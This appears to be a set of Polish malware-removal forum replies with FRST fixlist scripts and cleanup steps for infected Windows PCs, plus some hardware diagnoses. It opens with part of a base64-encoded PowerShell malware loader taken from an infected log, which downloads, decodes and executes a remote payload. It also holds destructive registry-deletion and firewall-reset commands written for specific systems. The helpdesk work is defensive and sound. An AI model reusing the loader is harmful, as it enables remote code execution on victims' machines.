AAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA Task: {033D7092-DE1C-4454-89AA-05A8083DE391} - System32\Tasks\{8E1133A2-01F8-4C42-A469-ACE6E7289288} => D:\Program Files (x86)\Origin Games\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe Task: {052D957C-7E11-484F-B4F5-8B8C8E33F91B} - System32\Tasks\{78DE3BA1-3E3E-4E4F-B9E2-074B0F2AB339} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe Task: {0F293F1A-D194-4867-884A-69C59320430E} - System32\Tasks\{EAC553F1-D08B-4925-A3BA-BCC809D59478} => pcalua.exe -a C:\Users\user\Downloads\LeagueofLegends_EUNE_Installer_9_15_2014.exe -d C:\Windows\SysWOW64 -c /groupsextract:100;101;102; /out:"C:\Users\user\AppData\Roaming\Riot Games\League of Legends\prerequisites" /callbackid:3600 Task: {0FD9D867-2DCB-45DE-B381-5EE9D74B70CC} - System32\Tasks\{02CF3B8C-FC72-41D4-A477-B0E779055772} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="2M0K-K085-4W59-U5LW-585P-W083-MM85-1Z8L-257X-66XA-TC3T-K1M8-3204-2A2C-5T2C-2408-4W3C-6482" Task: {12362DC9-80F7-454D-88B5-B9AE7BF1A0D9} - System32\Tasks\{519DC9CF-B253-4BD0-B1F9-FD29076769A0} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe Task: {18FC7AF2-23FA-421B-8D10-B8410B6D106B} - System32\Tasks\{CE59F049-6A9A-40D0-A419-101C5279A3E8} => D:\Błażeja\he\SETUP.EXE Task: {1C9EB64E-2395-4012-A3AE-891725717DC2} - System32\Tasks\psv_Tris-Dox => /c regedit.exe /s "C:\ProgramData\Airtostrong\Singlecore.reg" & del "C:\ProgramData\Airtostrong\Singlecore.reg" & SCHTASKS /Delete /TN "psv_Tris-Dox" /F Task: {1DC84E54-D157-490D-AC72-F75C537E6BA4} - System32\Tasks\{49E5CEBB-0AC0-4545-8049-2DC3D607DB49} => D:\Błażeja\gierka\TIM.EXE Task: {1F19FAB0-9744-4D28-B9D6-D70EC9C60A4B} - System32\Tasks\{00937042-8571-41D1-91B3-1BF34C315046} => D:\Błażeja\he\AUTORUN.EXE Task: {2D4AD31C-2F75-4981-A669-D85B9CD38C9C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe Task: {2FF1D73B-8B12-4451-9BF3-77F17B69B2F8} - System32\Tasks\{4078D993-C425-43E0-B6D2-F2C764BEBA6E} => D:\Błażeja\gierka\TIM.EXE Task: {33A26768-362D-4636-A891-3C6F51CAD3A9} - System32\Tasks\{DDE0E411-176D-42DB-B937-2F1D0D525894} => D:\Błażeja\he\AUTORUN.EXE Task: {38656597-0E88-4EA0-A313-D3CC04614FBF} - System32\Tasks\{A5653670-E66C-4620-9E53-C5083B1D3D0F} => D:\Błażeja\he\SETUP.EXE Task: {3BBB8B2E-23DD-48E6-89C3-D2528CFEC3F4} - System32\Tasks\{716F639A-0CFA-418F-9ED1-0C89FCF2896B} => D:\Błażeja\he\SETUP.EXE Task: {3F170444-D39E-4815-A23E-C28450A111E5} - System32\Tasks\{2B23447A-19FF-4564-80BC-69963AD32D3C} => D:\Błażeja\he\SETUP.EXE Task: {462515AA-E6DB-4AE8-8885-9C5087262D81} - System32\Tasks\Uninstaller_SkipUac_user => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe Task: {4D59D784-CB25-4CE4-9E69-78B620DB2F8D} - System32\Tasks\{2A750497-0662-416E-8208-08F54D1BEEB0} => D:\Błażeja\he\SETUP.EXE Task: {4DD34D73-43B0-441C-B82C-C9F291C8E22A} - System32\Tasks\{A92665E4-6694-467B-8348-43309181A29E} => D:\Błażeja\he\AUTORUN.EXE Task: {535CAE96-43DC-4861-B6BA-A61B6185029B} - System32\Tasks\{C77AEC94-F164-4E56-B715-0D9FE27BFF2F} => pcalua.exe -a C:\Users\user\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=cor Task: {5861F754-0176-4932-8E6E-B050E9A7C35B} - System32\Tasks\{81879AD0-2A8F-483E-8444-17020348989C} => D:\Błażeja\gierka\TIM.EXE Task: {5C970B67-F462-4D2C-A5A9-EECD5965E396} - System32\Tasks\{3DD5513E-4AF7-47A9-9966-479B510D0368} => D:\Błażeja\he\AUTORUN.EXE Task: {610828BC-D12B-47E7-BEDF-C20AC7B0D8B6} - System32\Tasks\{8638CA79-DC3A-4F4E-8A26-E35044F64681} => D:\Błażeja\he\AUTORUN.EXE Task: {6DA32D7C-A60D-4FC7-91B4-F1EF68C02341} - System32\Tasks\{4BE4FF64-67A0-49CB-94C5-03E755B74274} => D:\Błażeja\gierka\TIM.EXE Task: {7580E58E-C2B4-40B7-8C7D-09A268F2A7D2} - System32\Tasks\{0F4A0214-465E-447D-9241-A288AD32BC9C} => D:\Program Files (x86)\Origin Games\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe Task: {7B507388-861C-4C2A-A080-D964541BAE90} - System32\Tasks\PPTAssistantNotifyTask_user => C:\Users\user\AppData\Local\PPTAssist\notify.exe Task: {863B16B7-5E0A-48B2-B8D7-8A94A0F63627} - System32\Tasks\{5931D4C6-5DC0-4BE8-996C-FA9E0B647C66} => D:\Błażeja\gierka\TIM.EXE Task: {8BA60223-B239-4B65-9381-2138CC8E377D} - System32\Tasks\{34D26411-AD68-43FD-A503-42E123F92315} => C:\Users\user\Downloads\D3DGearSetup.exe Task: {8BB056F5-A2EC-47DD-9908-00465ECAB8AF} - System32\Tasks\Puukcog => C:\PROGRA~1\GROOVE~1\Fafrihn.bat Task: {9AD398C6-4820-40AF-8730-166334D654F3} - System32\Tasks\{BF2C238E-8706-4B71-AD5F-B1151EB43B06} => D:\Błażeja\gierka\TIM.EXE Task: {9D3F70F8-7F7C-4F8B-8507-F11BF0866D79} - System32\Tasks\{267EE13B-3EFF-4465-9B3B-CB49BF93F09F} => D:\Błażeja\gierka\TIM.EXE Task: {9ECCC56B-6FC2-4E6A-84C3-6F0407449E56} - System32\Tasks\Game_Booster_AutoUpdate => D:\gameboster\Game Booster 3\AutoUpdate.exe Task: {A14BF404-0C80-4360-A7A5-458313A385C8} - System32\Tasks\{DBBE9970-1FF1-4065-8083-20ED299C83AC} => D:\Błażeja\he\SETUP.EXE Task: {A496219A-5628-4E3A-A3F7-262E0CAE63BE} - System32\Tasks\Driver Booster SkipUAC (user) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe Task: {A857AC0B-FD34-467A-B956-88CB8B1BE5B6} - System32\Tasks\{49063295-09C4-4E9D-AC83-BDEFBA180313} => D:\Błażeja\he\AUTORUN.EXE Task: {B385E1D8-0DA3-44CA-A3D0-B92A3DFEC11A} - System32\Tasks\{CF8B4506-4BCA-4F56-86BA-32AC09EB36E7} => D:\Błażeja\gierka\TIM.EXE Task: {C2961999-8D00-4C90-8E81-3DD57F813842} - System32\Tasks\{733EED1B-27F9-4D04-84EE-6A4959F0BB72} => D:\Błażeja\he\SETUP.EXE Task: {CFDDF107-8609-408E-944D-80011FE0CC4C} - System32\Tasks\{5A7F4286-7082-4658-988D-19348134264C} => D:\Błażeja\he\AUTORUN.EXE Task: {D74BA335-34EE-4381-A3A9-7D722EBAD5DE} - System32\Tasks\Trojan Killer => C:\Program Files\GridinSoft Trojan Killer\trojankiller.exe Task: {DAC8805B-BDCF-4F34-9424-D1FD4AB9D0F9} - System32\Tasks\{5B62EAED-56C6-43FD-8FF4-2647A16BFEA3} => D:\Błażeja\he\AUTORUN.EXE Task: {E4194451-868B-48A4-8C42-682838A8B668} - System32\Tasks\PPTAssistantUpdateTask_user => C:\Users\user\AppData\Local\PPTAssist\assistupdate.exe Task: {EBA2728B-F677-45D8-925E-1391D2A291D9} - System32\Tasks\{649894F5-95BE-4C16-8715-E67386C75B82} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe Task: {F60DEB4F-3306-4187-B73C-65A9155DA8CD} - \Program aktualizacji online firmy Adobe. -> Brak pliku Task: {F9E871FF-DBF5-4821-8487-53778FBFDEB9} - System32\Tasks\{93B98DB1-4456-4A58-9BBA-D101380B94AF} => D:\Błażeja\he\SETUP.EXE U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) S3 gdrv; Brak ImagePath S3 MBAMSwissArmy; Brak ImagePath S3 usbbus; Brak ImagePath S3 UsbDiag; Brak ImagePath S3 USBModem; Brak ImagePath S3 WinRing0_1_2_0; Brak ImagePath S3 X6va029; Brak ImagePath S3 XFDriver64; Brak ImagePath S1 {991f0439-0e5b-4201-a65a-dee4d52c99b8}Gw64; Brak ImagePath S3 catchme; \??\C:\ComboFix\catchme.sys [X] S1 {25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw64; system32\drivers\{25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw64.sys [X] ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => Brak pliku ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => Brak pliku ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => Brak pliku GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130878280563065191&GUID=C2693E11-1A88-4C57-AF00-A69252726DAB HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/ HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE Toolbar: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku CHR HKLM\...\Chrome\Extension: [jeaohhlajejodfjadcponpnjgkiikocn] - CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - CHR HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fkkcgfbgohboipdhliafmacjnhjbhmim] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=pl-pl CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUTFbG3TDcHPXcZi2wJDROuM6HIYLtvb5wuzuFPdiccLRPqyfNMVujTKv4KKQI_t1PGJSRcJQn79oZyo2igbyrHm5AFDU5-2ZPOk0SNZ_lArGVqx9duzU6QCqkFxyd_VT3JDu8J2cBCV2MOqIJ&q={searchTerms} CHR DefaultSearchKeyword: Default -> feed.sonic-search.com CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms} DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\ACTION_SVC DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SBRegRebootCleaner DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\aotech C:\Program Files (x86)\baidu C:\Program Files (x86)\Lenovo C:\Program Files (x86)\Opera C:\Program Files (x86)\ppt C:\Program Files (x86)\TData C:\Program Files\Common Files\yuorxhac.exe C:\Program Files\Common Files\oi2l4pal C:\ProgramData\72b4b938-60b1-0 C:\ProgramData\72b4b938-64d3-1 C:\ProgramData\Airtostrong C:\ProgramData\kingsoft C:\ProgramData\TEMP C:\tmp C:\uninst C:\Users\user\AppData\Local\subhex.dat C:\Users\user\AppData\Local\subhex.exe.config C:\Users\user\AppData\Local\AION C:\Users\user\AppData\Local\CleanBrowserApp C:\Users\user\AppData\Local\Lenovo C:\Users\user\AppData\Local\Mozilla C:\Users\user\AppData\Local\Opera Software C:\Users\user\AppData\Local\PPTAssist C:\Users\user\AppData\Local\Tempfolder C:\Users\user\AppData\Roaming\*.* C:\Users\user\AppData\Roaming\AION C:\Users\user\AppData\Roaming\CleanBrowser C:\Users\user\AppData\Roaming\HerlhFepkae C:\Users\user\AppData\Roaming\kingsoft C:\Users\user\AppData\Roaming\Mozilla C:\Users\user\AppData\Roaming\NystBopgu C:\Users\user\AppData\Roaming\Opera Software C:\Users\user\AppData\Roaming\WarThunder C:\Users\user\Desktop\Kornela\Continue installation .lnk C:\Users\user\Desktop\Błażeja\LogMeIn Hamachi.lnk C:\Users\user\Downloads\dsound.dll C:\Windows\System32\Tasks\Lenovo C:\Windows\system32\xhd C:\Windows\SysWOW64\Number of results CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście Metric Collection SDK 35 > Dalej. 3. Wyczyść Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj MSN Homepage. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 6. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Brak związku z infekcją. Wprawdzie część problemów prawdopodobnie rozwiązałyby te kroki: 1. Zażalenia Instalatora Windows: Sugerują uszkodzone dane instalacyjne wymienionych programów. Przy tego typu komunikatach usuwa się dane MSI programów narzędziem Fix It: KLIK. 2. Błędy Internet Explorer: Jest tu potwornie stara wersja Internet Explorer 6. I wszystkie programy używające pośrednio tego silnika nie będą poprawnie działać. Do instalacji byłby Internet Explorer 8: KLIK. To niestety ostatnia wersja możliwa do instalacji na XP, także strasznie stara. 3. Ogólnie jest w systemie bałagan, dużo starych sterowników, co wymagałoby różnych deinstalacji. Ale powyższe objawy to prawdopodobnie tylko skutki innej usterki. Tu klaruje się problem sprzętowy. W Dzienniku zdarzeń są błędy złych bloków dysku, co jak najbardziej wyjaśnia uszkodzenia plików: Dziennik System: ============= Error: (01/24/2016 08:27:16 PM) (Source: 0) (EventID: 7) (User: ) Description: \Device\Harddisk0\D Temat przenoszę do działu Hardware. Dostarcz dane wymagane działem: KLIK.

Problemem nie jest infekcja, nie ma także żadnych oznak widocznej usterki w samym systemie prowadzącej do w/w efektu. Wprawdzie siedzi adware/PUP (w starcie BingSvc + powiązane modyfikacje w Firefox), ale na 100% nie jest przyczyną problemów. W tej fazie nie ma sensu się zajmować tym drobnym śmieciem, w niczym to nie pomoże. Wyniki w kwarantannie Panda także całkowicie bez związku. Skoro następuje samoistne wyłączenie, to sugeruje raczej problem czysto sprzętowy i ma kwalifikacje na wizytę ze sprzętem w serwisie. Temat przenoszę do działu Hardware, może ktoś coś podpowie. Dział wymaga innych danych: KLIK. Laptop działa poprawnie tylko kilka minut i się wyłącza (rozumiem, że to występuje także w Trybie awaryjnym), ale może przez te kilka minut pracy da się pobrać dane.

Przeprowadź następujące działania: 1. Odinstaluj zbędny program modyfikujący ustawienia przeglądarek: AVG Web TuneUp oraz starą wersję Java 8 Update 45. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Reg: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run CMD: type C:\Windows\system32\GroupPolicy\Machine\Registry.pol HKU\S-1-5-21-1478389184-2235289212-306251700-1000\...\Run: [C] => C:\Windows\system32\GroupPolicy\Machine\Registry.pol [750 2016-01-30] () GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-1478389184-2235289212-306251700-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://mysearch.avg.com/?cid={89F5F343-111D-4CE2-ACBD-692E11331BDB}&mid=717e4e1fe2b947cdbdb6d1572e78ef17-8f15886f106625561057cd13bc9337b43f44c325&lang=pl&ds=AVG&coid=avgtbavg&cmpid=0615piz&pr=fr&d=2015-05-06 19:17:56&v=4.2.4.155&pid=wtu&sg=&sap=hp URLSearchHook: [s-1-5-21-1478389184-2235289212-306251700-1000] UWAGA => Brak domyślnego URLSearchHook URLSearchHook: HKU\S-1-5-21-1478389184-2235289212-306251700-1000 - (Brak nazwy) - {0633EE93-D776-472f-A0FF-E1416B8B2E3D} - Brak pliku FF Extension: Brak nazwy - C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\krxz2cdq.default\extensions\deskCutv2@gmail.com [nie znaleziono] FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-02-04] [brak podpisu cyfrowego] Task: {6CC77D7D-1214-4307-AA30-4EB87D551CB6} - \UserBankruptciesBaulkiestV2 -> Brak pliku U1 eabfiltr; Brak ImagePath EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), już bez Addition i Shortcut. Dołącz też plik fixlog.txt.

To co pokazujesz to akurat pliki systemowe, pagefile.sys to kluczowy i niezbędny plik pamięci wirtualnej. Obecne od momentu instalacji Windows, tylko domyślnie ukryte. Teraz przestawiła Ci się opcja "Ukryj chronione pliki systemu operacyjnego", dlatego je widzisz. Natomiast system jest masowo zainfekowany adware, wliczając zmienione serwery DNS oraz zmodyfikowany plik dnsapi.dll. Jest tu również niepoprawnie odinstalowany pakiet McAfee. Akcje wstępne do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CMD: fltmc detach bsdriver c: bsdriver R1 bsdriver; C:\Windows\system32\drivers\bsdriver.sys [34712 2016-01-12] () R1 cherimoya; C:\Windows\System32\drivers\cherimoya.sys [56728 2016-01-12] (Windows ® Win 7 DDK provider) R1 {3240e2a0-4814-4f5d-9251-29a88a1c9b80}Gw64; C:\Windows\System32\drivers\{3240e2a0-4814-4f5d-9251-29a88a1c9b80}Gw64.sys [48752 2016-01-12] (StdLib) S4 0039231446143227mcinstcleanup; C:\Windows\TEMP\003923~1.EXE [882000 2015-07-23] (McAfee, Inc.) S3 AE6E65ED-A169-406C-a9B2-AA9226370E27; C:\Program Files\groover120120161726\Lhqegj.exe [290688 2016-01-13] () [brak podpisu cyfrowego] S3 csrcc; C:\Program Files\groover120120161726\csrcc.exe [1496960 2016-01-13] () [brak podpisu cyfrowego] S4 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe [68608 2015-09-29] (globalUpdate) [brak podpisu cyfrowego] S4 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe [68608 2015-09-29] (globalUpdate) [brak podpisu cyfrowego] S2 groover120120161726 Updater; C:\Program Files\groover120120161726\Gabrujxy.exe [159104 2016-01-12] () S4 ihpmServer; C:\Program Files (x86)\RayDld\ihpmServer.exe [268520 2015-09-25] () S4 IhPul; C:\Users\jan zbylut\AppData\Roaming\TSv\TSvr.exe [396944 2015-09-21] (tsvr.com) S4 NetTcpHandler; C:\Users\jan zbylut\AppData\Roaming\NetService\netservice.exe [173088 2015-07-09] () S4 ServiceUpdater; C:\Windows\SysWOW64\netupdsrv.exe [190976 2015-10-23] () [brak podpisu cyfrowego] R2 WindowsMangerProtect; C:\ProgramData\Tmp0x0x\ProtectWindowsManager.exe [343720 2016-01-12] (Sysinternals process Explorer) S4 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [707760 2015-10-20] (Taiwan Shui Mu Chih Ching Technology Limited) S2 wucotusy; C:\Program Files (x86)\158ACBD8-1452615913-1520-0220-181505000000\hnsu9714.tmp [416256 2016-01-13] () [brak podpisu cyfrowego] S2 zigipyro; C:\Users\jan zbylut\AppData\Local\158ACBD8-1452620144-1520-0220-181505000000\qnszEA29.tmp [158720 2016-01-13] () [brak podpisu cyfrowego] S2 zutuzuni; C:\Program Files (x86)\158ACBD8-1452615913-1520-0220-181505000000\jnsn78FB.tmp [307712 2016-01-13] () [brak podpisu cyfrowego] S2 AppMgr3.32.9611035; "C:\ProgramData\AppMgr3.32.9611035\AppMgr.exe" [X] S2 BrsHelper; C:\PROGRA~2\YTDOWN~1\BROWSE~2.EXE [X] S2 gyvixodu; C:\Program Files (x86)\158ACBD8-1443366342-1520-0220-181505000000\hnss711D.tmp [X] S2 lihitesy; C:\Program Files (x86)\158ACBD8-1443366342-1520-0220-181505000000\knsp89F2.tmp [X] S4 McNaiAnn; "C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe" /McCoreSvc [X] S3 McODS; "C:\ProgramData\McAfee\Update\Installs\pkg_default\Download_Files\default\vso\vso_li_cat\%VSINSTALL_DIR64%\mcods.exe" [X] S1 nethfdrv; \??\C:\Windows\system32\drivers\nethfdrv.sys [X] S2 Qhubuero; "C:\Users\jan zbylut\AppData\Roaming\JowkiUhat\Olyhlat.exe" -cms [X] S1 QMUdisk; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.0.16779.224\QMUdisk64.sys [X] S2 sbmntr; 